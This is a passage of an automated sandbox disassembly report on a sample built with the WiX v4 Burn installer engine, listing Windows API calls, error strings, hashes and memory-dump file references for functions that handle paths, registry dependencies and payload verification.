                                                                                                                                                                  • Opcode Fuzzy Hash: 429e7340fc0b77fc885cc5a6c4b17c851e081632c8a4702c7ba022c775d3cad4
                                                                                                                                                                  • Instruction Fuzzy Hash: 0F41FC73A452257BE7315BD4CC4AFAABA68AF85721F118155FE18FF2D1E2B09C00C6A0
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemWindowsDirectoryW.KERNEL32(00000000,00000105), ref: 00972390
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00976531,TEMP,00000000,80000002,System\CurrentControlSet\Control\Session Manager\Environment,00020019), ref: 0097239C
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get Windows directory path with default size., xrefs: 009723CC
                                                                                                                                                                  • Failed to terminate Windows directory path with backslash., xrefs: 0097249D
                                                                                                                                                                  • Failed to get Windows directory path with returned size., xrefs: 00972444
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp, xrefs: 00972379, 009723C0, 009723C6, 009723D7, 00972439, 0097243E, 009724AC
                                                                                                                                                                  • Failed to concat subdirectory on Windows directory path., xrefs: 00972477
                                                                                                                                                                  • Failed to alloc Windows directory path., xrefs: 0097236A
                                                                                                                                                                  • Failed to realloc Windows directory path., xrefs: 009723F2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DirectoryErrorLastSystemWindows
                                                                                                                                                                  • String ID: Failed to alloc Windows directory path.$Failed to concat subdirectory on Windows directory path.$Failed to get Windows directory path with default size.$Failed to get Windows directory path with returned size.$Failed to realloc Windows directory path.$Failed to terminate Windows directory path with backslash.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp
                                                                                                                                                                  • API String ID: 505562763-519864416
                                                                                                                                                                  • Opcode ID: 920eb67fb68805f2b698f2976ec26197acbd9d9f13f02e04aa1d72e57b0d793b
                                                                                                                                                                  • Instruction ID: cdcb86e9c105b7bfe1407639900f0769ee05f599a00db292d3733aa83103449e
                                                                                                                                                                  • Opcode Fuzzy Hash: 920eb67fb68805f2b698f2976ec26197acbd9d9f13f02e04aa1d72e57b0d793b
                                                                                                                                                                  • Instruction Fuzzy Hash: 1A410933AA0739B7D72257549C4AFAF296CDB85F54F128120FD48BB291E7B89D0056E0
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 0092E331
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092E341
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0092E48D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                  • String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$Payload has no verification information: %ls$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                  • API String ID: 2528220319-3234199796
                                                                                                                                                                  • Opcode ID: 6c69cee4f84f992b614e0cd179ae6b249e97310982f8f0c9555c79e440fd5fc7
                                                                                                                                                                  • Instruction ID: bc4da3beed9f5d248e8fda5ee2af8e963cd4ffd5338fdfd72d9ca22272463e3f
                                                                                                                                                                  • Opcode Fuzzy Hash: 6c69cee4f84f992b614e0cd179ae6b249e97310982f8f0c9555c79e440fd5fc7
                                                                                                                                                                  • Instruction Fuzzy Hash: 1641C032680225BBEF236E54DC4AFAF3E29EF49B14F154114FF147A2E5D2B6C8209761
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemWow64DirectoryW.KERNEL32(?,00000105,?,00000105), ref: 00914A67
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00914A73
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp, xrefs: 00914A97, 00914A9D, 00914AAE, 00914B33, 00914B38, 00914B74
                                                                                                                                                                  • Failed to allocate space for system wow64 directory., xrefs: 00914AC9
                                                                                                                                                                  • Failed to realloc system wow64 directory path., xrefs: 00914AF0
                                                                                                                                                                  • Failed to get max length of input buffer., xrefs: 00914A4A
                                                                                                                                                                  • Failed to get system wow64 directory path with returned size., xrefs: 00914B3E
                                                                                                                                                                  • Failed to terminate system wow64 directory path with backslash., xrefs: 00914B65
                                                                                                                                                                  • Failed to get system wow64 directory path with default size., xrefs: 00914AA3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DirectoryErrorLastSystemWow64
                                                                                                                                                                  • String ID: Failed to allocate space for system wow64 directory.$Failed to get max length of input buffer.$Failed to get system wow64 directory path with default size.$Failed to get system wow64 directory path with returned size.$Failed to realloc system wow64 directory path.$Failed to terminate system wow64 directory path with backslash.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                                  • API String ID: 1255099494-3047029672
                                                                                                                                                                  • Opcode ID: 2788b4a0dd242e9633fa0e7d44ac841c8d147e6c1138bc3517d6ebf5dc0fe64c
                                                                                                                                                                  • Instruction ID: 3e51a84886e10ca720a1aab942a7722327de94eaee83de6bde14fd1635e7ec79
                                                                                                                                                                  • Opcode Fuzzy Hash: 2788b4a0dd242e9633fa0e7d44ac841c8d147e6c1138bc3517d6ebf5dc0fe64c
                                                                                                                                                                  • Instruction Fuzzy Hash: D231F373BC473D73D72256558C4AFAF696CDF89B61F124120BA04BF2C1E2A4DD8082E9
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00914904
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,009118D8,?,?,00000000,?,?,?,009118B7,?,?,00000000,00000000), ref: 00914910
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp, xrefs: 00914934, 0091493A, 0091494B, 009149CF, 009149D4, 00914A0F
                                                                                                                                                                  • Failed to allocate space for system directory., xrefs: 00914966
                                                                                                                                                                  • Failed to realloc system directory path., xrefs: 0091498C
                                                                                                                                                                  • Failed to get max length of input buffer., xrefs: 009148E7
                                                                                                                                                                  • Failed to get system directory path with default size., xrefs: 00914940
                                                                                                                                                                  • Failed to terminate system directory path with backslash., xrefs: 00914A00
                                                                                                                                                                  • Failed to get system directory path with returned size., xrefs: 009149DA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DirectoryErrorLastSystem
                                                                                                                                                                  • String ID: Failed to allocate space for system directory.$Failed to get max length of input buffer.$Failed to get system directory path with default size.$Failed to get system directory path with returned size.$Failed to realloc system directory path.$Failed to terminate system directory path with backslash.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                                  • API String ID: 3081803543-4099084807
                                                                                                                                                                  • Opcode ID: 1e65c571345b2accfe2edda746942fe068a279a1f7b8adf90a076b9270159cb4
                                                                                                                                                                  • Instruction ID: eb511b9a226034a57c49149bd7f1015f4859aa5e0d9769ef2aad47a6bf300bed
                                                                                                                                                                  • Opcode Fuzzy Hash: 1e65c571345b2accfe2edda746942fe068a279a1f7b8adf90a076b9270159cb4
                                                                                                                                                                  • Instruction Fuzzy Hash: 7331E373B8072D77E73156548C8AFEF696CDB48F64F124125BE04BB2C1E6A49C8086E4
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetProcessShutdownParameters.KERNEL32(000003FF,00000000,?,00000000,?,?,?,?,00000000,00000001), ref: 0093D74C
                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0093D757
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0093D764
                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0093D370,?,00000000,00000000), ref: 0093D7CC
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0093D7D9
                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FF), ref: 0093D81F
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0093D838
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0093D849
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsParametersProcessShutdownThreadWait
                                                                                                                                                                  • String ID: Failed to create initialization event.$Failed to create the UI thread.$d:\a\wix4\wix4\src\burn\engine\uithread.cpp
                                                                                                                                                                  • API String ID: 665835008-3306212416
                                                                                                                                                                  • Opcode ID: 8419d5ea885c025ca2c3ab2660611edd5a5fca3c1fa836b56ceb11a034624600
                                                                                                                                                                  • Instruction ID: a3b2008b90e0d2d19602755c6c7a6df8a6e0f6c92e0ea31457407a4d730720a0
                                                                                                                                                                  • Opcode Fuzzy Hash: 8419d5ea885c025ca2c3ab2660611edd5a5fca3c1fa836b56ceb11a034624600
                                                                                                                                                                  • Instruction Fuzzy Hash: F531E9B6D01215BBD7119F989C89FAFBABCAB08750F104065B915F7280D6709E408AA1
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,8000FFFF,0097E7E8,00000000,00000000,00000000,00000000,8000FFFF,?,8000FFFF,8000FFFF,00916DA2), ref: 0091B5E6
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0091B83F
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to write variable value as number., xrefs: 0091B7A0
                                                                                                                                                                  • Failed to get string., xrefs: 0091B7DC
                                                                                                                                                                  • Failed to write variable name., xrefs: 0091B804
                                                                                                                                                                  • Unsupported variable type., xrefs: 0091B784
                                                                                                                                                                  • Failed to write variable value as string., xrefs: 0091B7C8
                                                                                                                                                                  • Failed to write included flag., xrefs: 0091B818
                                                                                                                                                                  • Failed to get numeric., xrefs: 0091B7B4
                                                                                                                                                                  • Failed to write variable count., xrefs: 0091B603
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 0091B615, 0091B82A
                                                                                                                                                                  • Failed to write variable value type., xrefs: 0091B7F0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to get numeric.$Failed to get string.$Failed to write included flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 3168844106-3226335872
                                                                                                                                                                  • Opcode ID: 820a249a5dc44aafa84cdf58e3435ebc041c6326e99632c8110591085549f43d
                                                                                                                                                                  • Instruction ID: 4a957a64b6a9c5a94884560f6a3b12495a2cb71505e90e5ef80732eefd25f95a
                                                                                                                                                                  • Opcode Fuzzy Hash: 820a249a5dc44aafa84cdf58e3435ebc041c6326e99632c8110591085549f43d
                                                                                                                                                                  • Instruction Fuzzy Hash: 6761C131B4031DBBDB229E54CC4AFDE7A69FF44B64F104150FA01BA2D1D3B1DA909B91
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$AllocClearInitString
                                                                                                                                                                  • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed XmlCreateDocument$failed put_preserveWhiteSpace$failed put_resolveExternals$failed put_validateOnParse$failed to allocate bstr for Path in XmlLoadDocumentFromFileEx$failed to load XML from: %ls
                                                                                                                                                                  • API String ID: 2213243845-3558707546
                                                                                                                                                                  • Opcode ID: 511ec4515e5254e9b60e6bbaf2ff4f9cb436d943a95b208891a16a4666608e07
                                                                                                                                                                  • Instruction ID: 7908328294e2063f5bafd9ebb89b8ab8fe243396540c0b4a03cdac35bc831e1f
                                                                                                                                                                  • Opcode Fuzzy Hash: 511ec4515e5254e9b60e6bbaf2ff4f9cb436d943a95b208891a16a4666608e07
                                                                                                                                                                  • Instruction Fuzzy Hash: D6512932B40725FBEB119B54CC46F9E77A9AFC9B10F0580A5F908FF281DAB099408B91
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00974F04: lstrlenW.KERNEL32(00917162,00916DEA,?,?,?,00975488,00917162,00916DEA,00916EC2,00916DEA,00916DEA,?,?,?,00930D28,0D8C6817), ref: 00974F2A
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00020019,00000000,00916CF2,00000000,00000000,00000000), ref: 009752A2
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00020019,00000000,00916CF2,00000000,00000000,00000000), ref: 009752B5
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to open the registry key "%ls". The dependency store is corrupt., xrefs: 0097516F
                                                                                                                                                                  • Failed to get the name of the dependent from the key "%ls"., xrefs: 009752EB
                                                                                                                                                                  • Failed to open the registry key for dependents of "%ls"., xrefs: 009751C4
                                                                                                                                                                  • Failed to check the dictionary of ignored dependents., xrefs: 00975210
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 00975121, 0097521F, 0097530E
                                                                                                                                                                  • Failed to allocate the registry key for dependency "%ls"., xrefs: 00975112
                                                                                                                                                                  • Failed to add the dependent key "%ls" to the string array., xrefs: 009752D7
                                                                                                                                                                  • Failed to enumerate the dependents key of "%ls"., xrefs: 009752FF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$lstrlen
                                                                                                                                                                  • String ID: Failed to add the dependent key "%ls" to the string array.$Failed to allocate the registry key for dependency "%ls".$Failed to check the dictionary of ignored dependents.$Failed to enumerate the dependents key of "%ls".$Failed to get the name of the dependent from the key "%ls".$Failed to open the registry key "%ls". The dependency store is corrupt.$Failed to open the registry key for dependents of "%ls".$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp
                                                                                                                                                                  • API String ID: 1752758355-2900922597
                                                                                                                                                                  • Opcode ID: a852660be84eea0f8d9f11dc67eee121e8c07b298d2fb5f99b35e23d4aad3f8e
                                                                                                                                                                  • Instruction ID: 83c894b7998f566f0c9a37d506c02b10ce0bbc6c9358c81c20a48be355bdd30f
                                                                                                                                                                  • Opcode Fuzzy Hash: a852660be84eea0f8d9f11dc67eee121e8c07b298d2fb5f99b35e23d4aad3f8e
                                                                                                                                                                  • Instruction Fuzzy Hash: 2E51C733E40A29FBEF619A90CC06FEF7A649B44751F538550BA18790E2D3F48E50DAD1
                                                                                                                                                                  APIs
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000003,?,?,0096A94F,?,?), ref: 009132DB
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0096A94F,?,?,00000000,0000FDE9,?,00917B05,00000003), ref: 009132E7
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,0096A94F,?,00000000,00000000,00000000,00000000,00000003,?,?,0096A94F,?,?), ref: 009133E6
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0096A94F,?,?,00000000,0000FDE9,?,00917B05,00000003), ref: 009133F0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                  • String ID: Not enough memory to allocate string of size: %u$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\strutil.cpp$failed to allocate string, len: %u$failed to convert to ansi: %ls$failed to get required size for conversion to ANSI: %ls$failed to get size of destination string
                                                                                                                                                                  • API String ID: 203985260-2965928106
                                                                                                                                                                  • Opcode ID: 4ef9faeb27ea7fa0289577f1afd465092da41003e40c49b13286b7fa2cde4cf6
                                                                                                                                                                  • Instruction ID: 7dccba4a4905fade39905072069b8c380bf21c262e7f01b6dcf06fb687085f35
                                                                                                                                                                  • Opcode Fuzzy Hash: 4ef9faeb27ea7fa0289577f1afd465092da41003e40c49b13286b7fa2cde4cf6
                                                                                                                                                                  • Instruction Fuzzy Hash: 1B51393274021DBBE7215B14CC4AFFF367CDB48764F418669B925AB1D0EAB09E808660
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00974F04: lstrlenW.KERNEL32(00917162,00916DEA,?,?,?,00975488,00917162,00916DEA,00916EC2,00916DEA,00916DEA,?,?,?,00930D28,0D8C6817), ref: 00974F2A
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000001,00000000,00000001,00000000,00916DA2,00916CF2,00020006,00000000,00000000,00000000,00000001,00000000,00916DA2,009331C1,00000000,00000000), ref: 009758FE
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00916DA2,00000000,00000001,00000000,00916DA2,00916CF2,00020006,00000000,00000000,00000000,00000001,00000000,00916DA2,009331C1,00000000,00000000), ref: 0097591C
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to create the dependency subkey "%ls"., xrefs: 00975833
                                                                                                                                                                  • Failed to create the dependency registry key "%ls"., xrefs: 009757C8
                                                                                                                                                                  • Failed to allocate dependent subkey "%ls" under dependency "%ls"., xrefs: 009757FF
                                                                                                                                                                  • Failed to set the %ls registry value to %d., xrefs: 009758D9
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 00975790, 00975842, 009758E8
                                                                                                                                                                  • Failed to allocate the registry key for dependency "%ls"., xrefs: 00975781
                                                                                                                                                                  • Failed to set the %ls registry value to "%ls"., xrefs: 00975874, 009758A5
                                                                                                                                                                  • %ls\%ls, xrefs: 009757E5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$lstrlen
                                                                                                                                                                  • String ID: %ls\%ls$Failed to allocate dependent subkey "%ls" under dependency "%ls".$Failed to allocate the registry key for dependency "%ls".$Failed to create the dependency registry key "%ls".$Failed to create the dependency subkey "%ls".$Failed to set the %ls registry value to "%ls".$Failed to set the %ls registry value to %d.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp
                                                                                                                                                                  • API String ID: 1752758355-602586573
                                                                                                                                                                  • Opcode ID: c611e4760ff170ce12cc47974d54c53bc54bb2f1702ea6dc821bbadb7305b496
                                                                                                                                                                  • Instruction ID: b2aff98dc4aa3de18cff5e6f51f447b3d55c36c00f1b7bdbdba00538aee2a07a
                                                                                                                                                                  • Opcode Fuzzy Hash: c611e4760ff170ce12cc47974d54c53bc54bb2f1702ea6dc821bbadb7305b496
                                                                                                                                                                  • Instruction Fuzzy Hash: E5519372E40619FBEF226F948C46FDF7F79EF45750F028125BA04791A1D3B18A10AB91
                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenW.KERNEL32(00000000,00000001,BundleUpgradeCode,00000000,00916DA2,00000000,00000000,00000001,0093303D,?,878D30FF,00932F8D,00000000,00933085,67E85650,00916CF2), ref: 0096D849
                                                                                                                                                                  • lstrlenW.KERNEL32(?,0093303D,00000001,00000000,0093303D,00000001,BundleUpgradeCode,00000000), ref: 0096D8D2
                                                                                                                                                                  • RegSetValueExW.ADVAPI32(?,878D30FF,00932F8D,00000000,00933085,67E85650,00916CF2,0093303D,00000001,00932F8D), ref: 0096D95B
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get total string size in bytes, xrefs: 0096D914
                                                                                                                                                                  • Failed to set registry value to array of strings (first string of which is): %ls, xrefs: 0096D98B
                                                                                                                                                                  • DWORD Overflow while adding length of string to write REG_MULTI_SZ, xrefs: 0096D887
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 0096D896, 0096D937, 0096D97F, 0096D984, 0096D99A
                                                                                                                                                                  • failed to copy string: %ls, xrefs: 0096D928
                                                                                                                                                                  • Failed to allocate space for string while writing REG_MULTI_SZ, xrefs: 0096D876
                                                                                                                                                                  • BundleUpgradeCode, xrefs: 0096D82A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
